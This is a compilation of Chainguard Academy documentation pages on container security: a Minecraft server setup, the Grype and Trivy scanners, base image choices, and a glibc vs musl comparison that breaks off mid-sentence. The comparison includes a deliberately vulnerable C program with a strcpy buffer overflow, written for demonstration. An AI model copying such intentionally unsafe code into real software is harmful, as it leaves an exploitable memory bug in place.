Data So far, we’ve run a Minecraft server with an ephemeral world: anytime you remove the containers and recreate the environment, a new world is created, so you’ll lose any progress you have made, such as builds and achievements. Minecraft servers have a special directory where the world data is stored. We’ll need to set up a volume for persisting that data. This way, even if you remove all containers and rebuild your image, your world will be reinstated when you run docker compose up again, and you won’t lose your progress. If you haven’t yet, stop any running containers and bring your environment down: docker compose down Next, create a named volume to store your world data: docker volume create guardcraft-world This volume will be set in a location that can be obtained with a docker volume inspect command: docker inspect guardcraft-world [ { "CreatedAt": "2025-02-14T12:20:08Z", "Driver": "local", "Labels": null, "Mountpoint": "/var/lib/docker/volumes/guardcraft-world/_data", "Name": "guardcraft-world", "Options": null, "Scope": "local" } ] The Mountpoint indicates where your world data will be persisted in the host machine. Next, open your docker-compose.yaml file using an editor of your choice and configure the minecraft-java service to use the named volume. You can replace the contents of the file with the following updated version: services:minecraft-java:image:cg-minecraft-serverbuild:context:.restart:unless-stoppedports:- 25565:25565environment:# Server properties Set Up# MC_* variables will be replaced in the server.properties file# Hyphens must be replaced with underscoresMC_gamemode:"survival"MC_difficulty:"easy"MC_motd:"Welcome to GuardCraft!"MC_level_name:"GuardCraft"MC_level_seed:"-3930782522362688416"volumes:- guardcraft-world:/usr/share/minecraftvolumes:guardcraft-world:external:trueThe external: true option tells Docker Compose that this volume is managed outside of the Compose lifecycle. You can now run the following command to bring your environment up and put the changes into effect. You don’t need to rebuild the image, since there are no changes to the Dockerfile: docker compose up This will start a new environment that uses the guardcraft-world volume to persist world data. If you check the volume mount now, it will be populated with the new world data: sudo ls /var/lib/docker/volumes/guardcraft-world/_data/GuardCraft advancements data datapacks DIM-1 DIM1 entities level.dat level.dat_old playerdata poi region session.lock stats You can now destroy and recreate your environment multiple times, but your world will be kept intact. 5 – Securing your Minecraft Server You now have a flexible containerized setup for your Minecraft server, using a low-to-zero CVE image from Chainguard. To keep your server secure, there are a few additional strategies you should consider, even if you’re running the server in a local network. Let’s go through each of them. Keep your image up-to-date It is important to always keep your image always up to date with the most recent version of system dependencies and the Minecraft server software. Outdated images accumulate vulnerabilities over time, becoming a target for exploitation by malicious actors. The Image Update Considerations article on Chainguard Academy has more guidance on what you should take into account when deciding on an update strategy. If you followed all steps in this guide so far, you should have set up an installation script that automatically downloads the latest version available for the server software. However, this happens at build time, which means you’ll need to rebuild the container in order to update. A good strategy is to set up a repository with your server setup and use a GitHub Action (or CI equivalent) to build and publish your image to a container registry. The GitHub documentation has more details on how to implement this action, and you can also check the GuardCraft repository for an example. Pin to a digest and set up Digestabot A digest is a unique identifier for a specific image build. When you pin your Dockerfile to a digest instead of a mutable tag, you make your build reproducible, because anyone building your Dockerfile will be using the exact same version of the base image. This section of our Image Update Considerations article on Academy has details on recommended practices for pinning images to a specific version. You can also refer to this video for a demonstration on how to use image digests. The downside of pinning your base image to a digest is that you’ll need to update your Dockerfile each time a new version of the image is available. You can automate most of this process with our Digestabot GitHub action, which will open a pull request with the updated digest each time a new image build becomes available. Change the default port Changing the default port is another recommended practice to mitigate exposure. To change the default port where your Minecraft server is running, you’ll need to set up the server-port property at the server.properties file. If you followed all steps in this guide, you should be able to set this as an environment variable called MC_server_port on your docker-compose.yaml file. Don’t forget to update your port redirection settings to reflect this change. For example, the following will spin up a server with default settings running on port 25567. services:java-server:image:guardcraft-javarestart:unless-stoppedports:- 25567:25567environment:MC_server_port:25567Set up an access list Minecraft servers have an access list feature that allows you to specify who can join your world. The Minecraft wiki has more details on how to set up this file within your server, but it’s essentially a JSON file containing the users who are allowed access to the server. This file should be included in the container image at build time. You must also change the white-list property on server.properties to true — in case you are using our Docker Compose setup, include a MC_white_list property set to true in your environment variables. Use online mode It is not mandatory to have your server connecting to Mojang online services. However, keeping your server online guarantees that only users with genuine Minecraft accounts can connect. You’ll also have the ability to identify users by their real usernames when they join the game. The online-mode property is set to true by default, so you don’t need to do anything — just keep it that way. Only change this to false for local network games, otherwise you’ll risk your server being raided by users with fake accounts. Servers in offline mode are referred to as “cracked servers” since it allows players with unlicensed copies of Minecraft to join. Conclusion In this tutorial, you learned how to set up a low-to-zero CVE Minecraft server using Chainguard’s Java runtime (JRE) container image. We started with a basic setup that we improved with bash scripts for installing and configuring the Java server. We also discussed some strategies for making your server more secure. Our Staying Secure section on Chainguard Academy has more resources on container security and CVEs. For more details about Java and other Chainguard Containers, please refer to the Containers Directory. --- ### Using Grype to Scan Container Images for Vulnerabilities URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/grype-tutorial/ Last Modified: June 6, 2024 Tags: CVE, Chainguard Containers Grype is a vulnerability scanner for container images and filesystems developed and maintained by Anchore and written in the Go programming language. Grype can scan from Docker, OCI, Singularity, podman, image archives, and local directory. Grype is compatible with SBOMs generated by Syft, and Grype’s vulnerability database draws from a wide variety of sources, including Wolfi SecDB. Grype is appropriate for one-off detection for manual CVE mitigation and in automated use in CI pipelines. Chainguard maintains a low-to-no CVE Chainguard Image for Grype based on our lightweight Wolfi distribution. Installation Container Images Grype is readily available as a container image. To pull the low-to-no-CVE Chainguard Container for Grype and perform a scan on the official Docker nginx image, run the following: docker run -it cgr.dev/chainguard/grype nginx Alternatively, you can scan using the official Grype Docker image: docker run -it anchore/grype:latest nginx Binary Installation Grype provides an installation script. To use it, change the path following the -b flag to a preferred installation location on your system path, such as /usr/bin. curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin Alternatively, find and download the appropriate package file or binary from the official releases page. Place the binary on your system path or install the package using the conventions for your OS and distribution. Note that Grype can also be built from source. Install via Package Manager Grype can be installed using the following commands specific to your OS and distribution: Homebrew brew tap anchore/grype brew install grype Chocolatey choco install grype -y Basic Usage Throughout this tutorial, we’ll use the grype command to run Grype. If you’re running Grype as a container image, replace this command with the appropriate docker run command, such as docker run -it cgr.dev/chainguard/grype. Scan an Image in a Registry To run Grype on an image on Docker Hub, pass the image name as an argument: grype nginx For images on other registries: grype cgr.dev/chainguard/nginx Scan a .tar File To scan an image stored to .tar, pass the path to the archive file as an argument: docker pull cgr.dev/chainguard/nginx docker save cgr.dev/chainguard/nginx > nginx_chainguard_image.tar.gz grype nginx_chainguard_image.tar.gz Scan a Local Directory Grype can scan local directories, such as Python virtual environments (venv) or node_modules folders. To try it out, start by creating a Python virtual environment: python -m venv venv Add a few out-of-date packages that will show vulnerabilities: ./venv/bin/pip install WTForms==2.3.3 Werkzeug==2.0.1 Scan the virtual environment folder by passing the folder path to Grype as an argument: grype venv We can do the same with node modules in a node_modules folder. First, create an empty project folder and change the working directory to that folder: mkdir node_project && cd node_project Next, initialize npm with a default configuration: npm init -y Install a package with known vulnerabilities. The 6.5.2 version of the qs query string parser has a known vulnerability allowing for prototype poisoning. npm install qs@6.5.2 Finally, use Grype to scan the current working directory: grype . Scan from an SBOM Grype can read vulnerabilities from SBOMs generated by Syft. SBOMs can be piped into Grype using stdin: syft -o syft-json python > sbom.json cat sbom.json | grype You should see Grype results based on the packages itemized in the SBOM. Comprehending Grype Output By default, Grype output is divided into two sections: a summary of information on the scanned artifact and an itemized list of CVEs. In this section, we’ll use an Alpine version of the official Python image as an example. Since we’re specifying an older version, you may encounter more CVEs when following the examples than are shown here, as CVEs will accumulate on an image over time. Scan the image with the following command: grype python:3.10.14-alpine3.20 You will receive output similar to the following: ✔ Vulnerability DB [no update av ✔ Parsed image sha256:f48490 ✔ Cataloged contents 09feb83998b9d ├── ✔ Packages [47 pac │ └── ⠹ Linux kernel cataloger ├── ✔ File digests [659 fi ├── ✔ File metadata [659 lo └── ✔ Executables [144 ex ✔ Scanned for vulnerabilities [10 vulnerabi ├── by severity: 0 critical, 1 high, 8 medium └── by status: 7 fixed, 3 not-fixed, 0 igno NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY busybox 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium busybox 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium busybox-binsh 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium busybox-binsh 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium pip 23.0.1 23.3 python GHSA-mq26-g339-26xf Medium python 3.10.14 binary CVE-2023-36632 High python 3.10.14 binary CVE-2023-27043 Medium python 3.10.14 binary CVE-2024-4030 Unknown ssl_client 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium ssl_client 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium Interpreting the Summary In the initial portion of its results output, Grype summarizes information on the scanned artifact and gives an overview of known vulnerabilities. In the case of a scanned image, the output includes the image digest, a unique hash of the image that can be used as an identifier. Overview output includes the number of packages, files, and executables found in the artifact. Generally speaking, CVEs are detected against packages, but the number of executables detected can also give you an idea of the attack surface of the scanned image or filesystem. Finally, this portion gives a count of the number of CVEs detected by severity and fixed status. Severity categorization sorts CVEs into four categories based on the Common Vulnerability Scoring System (CVSS). What is CVSS?? CVEs are assigned numerical scores according to the Common Vulnerability Scoring System (CVSS), an open framework for communicating the severity of software vulnerabilities. CVSS scores correspond to four categories Critical (9.0-10.0) High (7.0-8.9) Medium (4.0-6.9) Low (0.1-3.9) In general, the higher the score, the more serious the vulnerability. Higher scores should be prioritized during CVE remediation. In our output, we can see that we have 0 critical, 1 high, and 8 medium CVEs: ├── by severity: 0 critical, 1 high, 8 medium, 0 low, 0 negligible Grype also counts the number of CVEs by fixed status. If a CVE is marked as fixed, it can be resolved by updating to a newer version of the package. Our output suggests that 7 packages have been fixed and can be remediated with updates: └── by status: 7 fixed, 3 not-fixed, 0 ignored Itemized CVEs In addition to the summary, Grype provides an itemized list of CVEs. By default, these are in table format, and list the package name, current version, severity, and package type (such as apt, apk, or binary). If the package is fixed, Grype will also indicate the package version where the fix was introduced. Grype writes itemized CVEs to stdout, so you can redirect the report of itemized CVEs to a file: grype python:3.10.14-alpine3.20 > report.txt Alternatively, you can use the --file flag to write to a file: grype --file report.txt python:3.10.14-alpine3.20 Redirecting output can also be useful to suppress a long list of CVEs, making the summary more immediately accessible. Output Formats Standard Formats You can use Grype to write itemized CVEs to a number of formats, including the XML- or JSON-based cyclonedx SBOM standard and the SARIF static analysis format. To maximize the information provided by Grype, use the JSON output type: grype -o json python:3.10.14-alpine3.20 > report.json When using these more detailed formats, Grype provides additional useful fields, such as the data source of the CVE, URLs to information on the CVE, advisories, related vulnerabilities, and details on how the vulnerability was detected. Output Templates Additional output formats are available as Hugo templates. These include output templates for HTML and CSV, and a full list can be found at the Grype GitHub repository. To generate a HTML file of the itemized CVEs, first clone the Grype repository from GitHub. Then provide the path to the template file in your grype command: git clone git@github.com:anchore/grype.git ~/.grype grype -o template -t ~/.grype/templates/html.tmpl python:3.10.14-alpine3.20 > report.html To generate a CSV: git clone git@github.com:anchore/grype.git ~/.grype grype -o template -t ~/.grype/templates/csv.tmpl python:3.10.14-alpine3.20 > report.csv grype explain Grype provides an explain subcommand that gives information on the nature of a specific CVE, how it was matched, and the locations of files associated with the vulnerability. The output of this command suggests a useful starting point for remediation. To use grype explain, generate JSON output from Grype and pipe it into the grype explain subcommand. Indicate the CVE you’d like information on using the --id flag. The -q flag in the following example suppresses the summary output. grype -q python:3.10.14-alpine3.20 -o json | grype explain --id CVE-2023-36632 Grype uses information from the JSON output to generate a human-readable report on the specific CVE that includes match information, file locations, and links to information on the vulnerability. Additional Resources The following resources may also be useful while working with Grype: Tools Syft - A Grype-compatible tool for generating SBOMs from images and filesystems. Grype-DB - A tool to build Grype databases from specific upstream vulnerability database providers Vunnel - A tool for collating vulnerability provider data Grype Chainguard Container — A low-to-no CVE container image maintained by Chainguard More on Grype Chainguard Deep Dive 🤿: Where Does Grype Data Come From? Grype on the Anchore blog - Blog posts from Anchore related to Grype Why Chainguard uses Grype - Why Chainguard contributes to and recommends Grype for vulnerability scanning in container images --- ### OpenAPI Specification URL: https://edu.chainguard.dev/chainguard/administration/api/ Last Modified: October 6, 2020 nav .nav-item svg { display: inherit !important; } .docs-sidebar { display: none !important; } main.docs-content { width: 100% !important; padding: 0 !important; } main.docs-content.has-toc { max-width: calc(100dvw - 384px); margin: 0 48px 0 48px; } main h1 { font-size: 2.5rem !important; margin: 2rem 0 1rem; } nav.docs-toc { display: none !important; } elements-api { display: block; } --- ### Using Trivy to Scan Software Artifacts URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/trivy-tutorial/ Last Modified: July 3, 2024 Tags: Conceptual, CVE Trivy is a vulnerability scanner for a wide variety of software artifacts and deployments. Trivy is written in the Go programming language and is maintained by Aqua Security. Trivy targets container images, VMs, filesystems, remote GitHub repositories, and Kubernetes and Amazon Web Services deployments. The tool can be used to detect known vulnerabilities (CVEs), generate SBOMs, analyze licenses, and scan for misconfigurations and exposed secrets. Trivy can be installed from package managers or as a binary, and can also be run as a container image. Installation Package Managers For Homebrew, use: brew install trivy Aqua Security maintains sources and packages for a variety of additional operating systems and distributions on their installation page. Binary Installation Aqua Security provides an installation script for Trivy. To install Trivy with the script, change the /usr/local/bin argument to the desired installation location on your path before running the following command: curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin v0.52.2 On many system configurations, you may need to provide elevated permissions via sudo: curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sudo sh -s -- -b /usr/local/bin v0.52.2 You can also manually install Trivy by downloading the binary for your operating system and architecture from the Trivy releases page and manually placing the binary on your path. Container Image Container images for Trivy are hosted on a variety of registries. When running Trivy as a container image, it is recommended to mount a cache directory as a volume. For scanning container images, it is also recommended to mount docker.sock. The following command will pull Trivy from Docker Hub, mount the two volumes, run the Trivy container, and use the running container to scan the official nginx image on Docker Hub: docker run \ -v /var/run/docker.sock:/var/run/docker.sock \ -v $HOME/Library/Caches:/root/.cache/ \ aquasec/trivy:0.52.2 \ image nginx Basic Usage Throughout this tutorial, we’ll use the trivy command to run Trivy. If you’re running Trivy as a container image, replace this command with the appropriate docker run command. To use Trivy, provide a subcommand indicating the type of artifact or deployment to be scanned along with the location of the target. For example, to scan the official Python image on Docker Hub: trivy image python Trivy will output a series of informational messages, a short summary of CVEs found, including severity, and an itemized list of CVEs. Valid Targets Trivy can scan a wide variety of artifacts, collections, or deployments, collectively called targets. Each type of software artifact has a specific set of Trivy scanners enabled by default. For example, when scanning container images, Trivy will look for vulnerabilities and exposed secrets by default. Scanning a Container Image To scan a container image on Docker Hub, use the image subcommand and the name of the image as an argument: trivy image nginx For images on other registries: trivy image cgr.dev/chainguard/nginx:latest Scanning a Filesystem Trivy can recursively scan directories on a local machine.. To start a filesystem scan, run: trivy fs <path> where <path> indicates the root folder where the scan will begin. Trivy looks out for specific files containing lists of packages, such as Python’s requirements.txt or poetry.lock, PHP’s composer.lock, or Node’s package-lock.json. The following creates a Python project folder with virtual environment, installs a set of older packages, generates a requirements.txt file itemizing all transitive dependencies, and scans the project folder using Trivy: mkdir python-project && cd python-project python -m venv venv ./venv/bin/pip install WTForms==2.3.3 Werkzeug==2.0.1 ./venv/bin/pip freeze > requirements.txt trivy fs . The following creates a default Node project, installs an older package with npm, and scans the project with Trivy: mkdir node_project && cd node_project npm init -y npm install qs@6.5.2 trivy fs . You should see a summary and itemized list of CVEs for the outdated Node package. Scanning Clusters To scan a Kubernetes cluster: trivy k8s --report summary <cluster-name> To try out the above command on a test Kubernetes cluster, First install Kind, a utility allowing Kubernetes to be run on your local machine. Once Kind is installed and accessible on your path, run the following to create a cluster: kind create cluster --name test-cluster Run the following to scan the new cluster with Trivy: trivy k8s --report summary kind-test-cluster When scanning clusters, requesting only summary output is recommended, as tables in more verbose output may not display correctly. Scanning SBOMs Trivy can both generate and scan SBOMs. What is an SBOM? A Software Bill of Materials (SBOM) is a formally structured list of libraries, modules, licenses, and version information that make up any given piece of software. An SBOM provides a comprehensive view of the components contained in a software artifact, allowing for systematic analysis, investigation, and automation. SBOMs are most useful in identifying known vulnerabilities, surveying licenses for compliance, and making decisions based on project status or supplier trust. Read more about SBOMs on Chainguard Academy. First, generate an SBOM file in CycloneDX format to scan trivy image -f cyclonedx -o results.cdx.json nginx Trivy can scan this generated CycloneDX SBOM with the following: trivy sbom results.cdx.json By default, the sbom subcommand scans only for vulnerabilities. License scanning can be enabled using the --scanners license flag. Some image providers, such as Chainguard, associate images with an SBOM attestation verifying that the image has not been tampered with since the time of creation. Trivy provides functionality to query attestations registered in the Rekor transparency log. To retrieve an SBOM attestation from a Rekor transparency log, set the --sbom-sources flag to rekor and provide the --rekor-url flag to the instance of the transparency log you wish to query against. The following will perform a scan using the SBOM attestation for Chainguard’s nginx image as registered on the Rekor public server: trivy image --sbom-sources rekor --rekor-url https://rekor.sigstore.dev/ cgr.dev/chainguard/nginx Learn more about SBOMs and other output formats in the section on specifying output formats. Comprehending Trivy Output When run with default output and formatting, Trivy first prints a series of informational messages and warnings, then the name of the image and a one-line summary of the number and severity of issues found, and finally a table itemizing each issue. In this section, we’ll use an Alpine version of the official Python image as an example. Since we’re specifying an older version, you may encounter more CVEs when following the examples than are shown here, as CVEs will accumulate on an image over time. Scan the image with the following command: trivy image python:3.10.14-alpine3.20 You will receive output similar to the following: Interpreting Trivy Output The initial logging portion of Trivy’s output indicates which scanners are enabled and shows warnings if Trivy has an issue performing the scan. In the initial portion of its results output, Trivy summarizes information on the scanned artifact and gives an overview of known vulnerabilities. In the case of a scanned image, the output includes the image digest. This is a unique hash of the image that can be used as an identifier. Following the log, Trivy shows the name of the image and a count of issues by severity. Total: 8 (UNKNOWN: 0, LOW: 0, MEDIUM: 8, HIGH: 0, CRITICAL: 0) When scanning for vulnerabilities, this severity categorization sorts CVEs into four categories based on the Common Vulnerability Scoring System (CVSS). What is CVSS? CVEs are assigned numerical scores according to the Common Vulnerability Scoring System (CVSS), an open framework for communicating the severity of software vulnerabilities. CVSS scores correspond to four categories Critical (9.0-10.0) High (7.0-8.9) Medium (4.0-6.9) Low (0.1-3.9) In general, the higher the score, the more serious the vulnerability. Higher scores should be prioritized during CVE remediation. In the case of a license scan, Trivy instead uses its own assessment of the business risk posed by specific license clauses. Similarly, explosed secrets and misconfigurations have their own severity mapping as determined by Aqua Security. Itemized CVEs In addition to the log and brief summary, Trivy provides an itemized list of issues. By default, these are in table format, and for a vulnerability scan list the library, vulnerability, severity, status, installed version, and fixed version of each issue. Other types of scan list different data—for example, a license scan lists the package, license, license classification, and perceived severity of business risk. When scanning for vulnerabilities, information on fixed version can show which CVEs can be resolved by bumping the library version. Trivy also provides a short prose description of the nature of each issue. By default, Trivy’s table output is relatively verbose, and Trivy does not respect the traditional 80-character line limit on terminal output. See Output Formats and Verbosity for information on more granular control over Trivy’s output. Scanners Specifying Scanners Trivy can scan not only for known vulnerabilities, but also for misconfigurations, exposed secrets, and license risks. When scanning container images or filesystems, Trivy scans for vulnerabilities and exposed secrets by default. Individual scanners can be selected by passing a comma-separated list after the --scanners flag. To add a misconfigurations scan to an analysis of a container image: trivy image --scanners vuln,misconfig,secret nginx To recursively scan only for exposed secrets on a filesystem: trivy fs --scanners secret . This will perform a recursive scan of all files and folders in the current working directory. License Scanning Trivy provides an opinionated license scan that flags license clauses that may pose a business risk. To perform a license scan on a container image: trivy image --scanners license nginx By default, the Trivy license scan only looks at packages installed by managers such as apt or apk. To scan other files, add the --license-full flag: trivy image --scanners license --license-full nginx Using the --license-fullflag will also show results for “loose” licenses, such as those provided as text files in project folders. Output Formats and Verbosity Specifying Output Formats Trivy allows output in JSON, SARIF, CycloneDX, SPDX, SPDX-JSON, and GitHub formats. If no output or format flags are specified, Trivy first prints a series of informative messages and warnings to stderr and then prints a table of results to stdout. The -q or --quiet flag suppresses the logging output normally printed to stderr. The following returns just the line summarizing the number and severity of issues: trivy image -q nginx | grep Total: Total: 173 (UNKNOWN: 2, LOW: 88, MEDIUM: 59, HIGH: 22, CRITICAL: 2) The -f or --format flag specifies the output format, and the -o or --output flag specifies an output file. The following writes a JSON-formatted report to a results.json file. trivy image -f json -o results.json nginx Similarly, the following would write a report in SARIF format: trivy image -f sarif -o results.sarif nginx Other formats can be generated by passing the appropriate format type with the -f or --format flag. Generating SBOMs The CycloneDX, SPDX, and SPDX-JSON output formats are considered SBOMs, and can be scanned with the trivy sbom subcommand. The following command will generate an SBOM in CycloneDX format: trivy image -f cyclonedx -o results.cdx.json nginx See Scanning SBOMs for more on scanning these output formats. Generating a Report from a Template Trivy can generate reports in additional formats from user-contributed templates. To use templates, first clone the Trivy GitHub repository to your home folder: git clone https://github.com/aquasecurity/trivy.git ~/.trivy To generate a report using the HTML template, specify the path to the template in the cloned repository: trivy image --format template --template "@.trivy/contrib/html.tpl" -o report.html nginx This HTML output can be significantly more readable than Trivy’s default table output: Other template-based output formats can be browsed in the Trivy contrib directory. Trivy Resources The following resources may complement your use of Trivy: Trivy Documentation — Documentation on the latest version of Trivy Trivy Operator for Kubernetes — An operator to continuous scan a Kubernetes cluster for issues Trivy Announcements — News on Trivy from Aqua Security --- ### Choosing a Container for your Compiled Programs URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-compiled-programs/compiled-programs/ Last Modified: April 7, 2025 Tags: Chainguard Containers, Product, Cheatsheet When selecting the right base image for your application, there are a variety of factors to take into consideration. For starters, it is critical that your application has all of the dependencies it needs to run. The ideal base image will contain the essential packages you need, while leaving out the ones you don’t. However, in practice, you will need to build upon your container images so they meet your specific needs, making it all the more important that you have a strong foundation. In this guide, we will explore a variety of Chainguard Containers which are suitable for different compiled applications. We will take a look at their availability and use-case differences so you can move closer to settling on the best base image for your specific needs. Available Container Containers wolfi-base The wolfi-base Chainguard Container is a minimal container image based on the Wolfi un-distro, a community-oriented Linux distribution created by Chainguard to facilitate image builds. The wolfi-base image contains busybox and apk-tools so that you can build your own packages for a custom image. It also supports glibc. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. The following packages are included in the wolfi-base:latest Chainguard Containers: apk-tools busybox ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux chainguard-base Paid Container In addition to the functionality of the wolfi-base Chainguard Container, chainguard-base reports as being a Chainguard Container, which scanners use to determine what security feeds to reference for vulnerabilities. Additionally, the chainguard-base container image provides access to vulnerability remediation SLAs to ensure your containers are always up-to-date with the latest releases and patches. The following packages are included in the chainguard-base:latest Chainguard Container: apk-tools busybox ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux You can find the complete inventory of packages for the chainguard-base Chainguard Container at its listing on Chainguard’s registry. static The Chainguard static base image is a Wolfi-based image available in one variant with the :latest tag. The static image is extremely minimal and is not intended to be run directly. It is used to host stand-alone, static binaries, like those produced by compilers such as gcc, go, and rust. It does not contain any programs you can run out-of-the-box. You must add your own static binaries to the image, for example using a Dockerfile multi-stage build. The following packages are included in the static:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc-locale-posix tzdata wolfi-baselayout You can find more information about the static Chainguard Container at its listing on the Chainguard’s registry. glibc-dynamic The glibc-dynamic Chainguard Container is best suited for when you need to host dynamically linked binaries that depend on the C standard library. Like the static image, glibc-dynamic is intended to be used as a base image only, and you must add your own binaries to the image. The glibc-dynamic image is freely available in two variants: :latest and :latest-dev. The :latest-dev image adds additional packages which are not present in :latest to help facilitate application development. It is suggested to use the :latest image for production-facing purposes because of its smaller footprint. The following packages are included in the glibc-dynamic:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux libgcc libstdc++ wolfi-baselayout You can find more information about the glibc-dynamic Chainguard Container at its listing on Chainguard’s registry. cc-dynamic The cc-dynamic Chainguard Container is deprecated. It is suggested that you use the glibc-dynamic image instead, as it is designed to replace cc-dynamic. You can find more information about the cc-dynamic image, such as its packages and licensing information, on Chainguard’s registry. gcc-glibc The gcc-glibc Chainguard Container is best suited for building C applications which depend on glibc. There are two freely available variants of this image, :latest and :latest-dev. :latest-dev is a developer variant of the image which adds additional packages such as bash to facilitate the development process. In comparison to the static and glibc-dynamic Chainguard Containers, gcc-glibc is intended to be used to develop programs based on the C standard library, instead of simply hosting binaries. Because of this, it contains additional packages such as make, busybox, as well as gcc to compile programs. The following packages are included in the gcc-glibc:latest Chainguard Container: binutils build-base busybox ca-certificates-bundle gcc glibc You can find the complete inventory of packages for the gcc-glibc Chainguard Container at its listing on Chainguard’s registry. glibc-openssl Paid Container The glibc-openssl Chainguard Container is designed for C applications which depend on OpenSSL. It contains the openssl and openssl-provider-legacy packages to support this use-case. It comes in two variants,latest and latest-dev. As in the aforementioned images, latest is designed for deployment, while latest-dev contains additional packages to assist in program development such as a shell and package manager. The following packages are included in the glibc-openssl:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux openssl openssl-provider-legacy You can find the complete inventory of packages for the glibc-openssl Chainguard Container at its listing on Chainguard’s registry. What About musl? At the time of this writing, no Chainguard Containers come packaged with musl. Chainguard builds glibc-based container images because glibc is commonly used, which makes it easier for most developers to start consuming Chainguard Containers in their environments. Additionally, glibc is widely tested, making it a dependable choice for a C standard library implementation. As glibc is a well-established option, choosing to use glibc ensures more applications will be compatible with new images. Though musl is sometimes chosen because of its minimal footprint, Chainguard’s distroless approach based on Wolfi often results in a container image of comparable (or smaller) size than official musl based images. For more information, please refer to our glibc vs. musl article. Next Steps Understanding the differences between various Chainguard Containers allows you to make informed decisions about what images to choose for your compiled applications. You can check out our complete suite of Chainguard Containers on Chainguard’s registry. To learn more about using Chainguard Containers, head to the Chainguard Academy, where you can find documentation to help you start incorporating them into your workflow. Interested in learning more about adopting Chainguard Containers for your organization? Let’s get in touch! --- ### glibc vs. musl URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-compiled-programs/glibc-vs-musl/ Last Modified: April 7, 2025 Tags: Chainguard Containers, Product, cheatsheet Over the years, various implementations of the C standard library — such as the GNU C library, musl, dietlibc, μClibc, and many others — have emerged with different goals and characteristics. These various implementations exist because the C standard library defines the required functionality for operating system services (such as file input/output and memory management) but does not specify implementation details. Among these implementations, the GNU C Library (glibc) and musl are among the most popular. When developing Wolfi, the “undistro” on which all Chainguard Containers are built, Chainguard elected to have it use glibc instead of another implementation like musl. This conceptual article aims to highlight the differences between these two implementations within the context of Chainguard’s choice of using glibc over musl as the default implementation for the Wolfi undistro. Note: Several sections of this guide present data about the differences between glibc and musl across various categories. You can recreate some of these examples used to find this data with the Dockerfiles and C program files hosted in the glibc-vs-musl directory of the Chainguard Academy Containers Demos repository. High-level Differences between glibc and musl The GNU C Library (glibc), driven by the GNU Project, was first released in 1988. glibc aims to provide a consistent interface for developers to help them write software that will work across multiple platforms. Today, glibc has become the default implementation of the C standard library across the majority of Linux distributions, including Ubuntu, Debian, Fedora, and even Chainguard’s Wolfi. musl (pronounced “muscle”) was first released in 2011 as an alternative to glibc. The goal of musl is to strive for “simplicity, resource efficiency, attention to correctness, safety, ease of deployment, and support for UTF-8/multilingual text.” While not as widely used as glibc, some Linux distributions are based on musl, the most notable being Alpine Linux. The following table highlights some of the main differences between glibc and musl. Criteria glibc musl First Release 1988 2011 License GNU Lesser General Public License (LGPL) MIT License (more permissive) Binary Size Larger Binaries Smaller Binaries Runtime Performance Optimized for performance Slower performance Build Performance Slower Faster Compatibility POSIX Compliant + GNU Extensions POSIX Compliant Memory Usage Efficient, higher memory usage Potential performance issues with large memory allocations (e.g. Rust) Dynamic Linking Supports lazy binding, unloads libraries No lazy binding, libraries loaded permanently Threading Native POSIX Thread Library, robust thread safety Simpler threading model, not fully thread-safe Thread Stack Size Varies (2-10 MB), based on resource limits Default size is 128K, can lead to crashes in some multithreaded code Portability Issues Fewer portability issues, widely used Potential issues due to different system call behaviors Python Support Fast build times, supports precompiled wheels Slower build times, often requires source compilation NVIDIA Support Supported by NVIDIA for CUDA Not supported by NVIDIA for CUDA Node.js Support Tier 1 Support - Full Support Experimental - May not compile or test suite may not pass Debug Support Several debug features available such as sanitizers, profilers Does not support sanitizers and limited profilers DNS Implementation Stable and well-supported Historical reports of occasional DNS resolution issues Be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alipne binaries into a Wolfi-based container image. Buffer Overflows musl lacks default protection against buffer overflows, potentially causing undefined behavior, while glibc has built-in stack smashing protection. Running a vulnerable C program, glibc terminates with an error upon detecting an overflow, whereas musl allows it without warnings. Even using FORTIFY_SOURCE or -fstack-protector-all won’t prevent the overflow in musl. To illustrate buffer overflow, this section outlines running a vulnerable C program. Creating the necessary files First, create a working directory and cd into it. mkdir ~/ovrflw-bffr-example && cd $_ Within this new directory, create a C program file called vulnerable.c. #include <stdio.h>#include <string.h> int main() { char buffer[10]; strcpy(buffer, "This is a very long string that will overflow the buffer."); printf("Buffer content: %sn", buffer); return 0; } Next create a Dockerfile named Dockerfile.musl to create an Container which will use musl as the C library implementation: FROMalpine:latestRUN apk add --no-cache gcc musl-devCOPY vulnerable.c /vulnerable.cRUN gcc -o /vulnerable_musl /vulnerable.cCMD ["vulnerable_musl"]Then create a Dockerfile named Dockerfile.glibc for one that uses glibc: # Build stageFROMcgr.dev/chainguard/gcc-glibc AS buildWORKDIR/workCOPY vulnerable.c /work/vulnerable.cRUN gcc vulnerable.c -o vulnerable_glibc# Runtime stageFROMcgr.dev/chainguard/glibc-dynamicCOPY --from=build /work/vulnerable_glibc /vulnerable_glibcCMD ["/vulnerable_glibc"]Next, you can build and test both of the new images. Building and testing the container images First build the image that will use musl: docker build -t musl-test -f Dockerfile.musl . Then build the image that will use glibc: docker build -t glibc-test -f Dockerfile.glibc . Then you can run the containers to test them. First run the musl-test container: docker run --rm musl-test Because musl 